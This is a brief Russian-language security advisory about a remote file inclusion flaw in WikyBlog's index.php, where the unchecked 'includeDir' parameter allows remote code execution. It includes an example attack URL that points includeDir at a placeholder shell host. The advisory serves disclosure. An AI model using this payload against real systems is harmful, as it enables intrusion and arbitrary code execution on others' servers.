Программа: WikyBlog
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки проверки входных данных в параметере «includeDir” сценарием index.php.
Пример:
http://www.example.com/[scriptPath]/index.php?includeDir=http://SHELLURL.COM
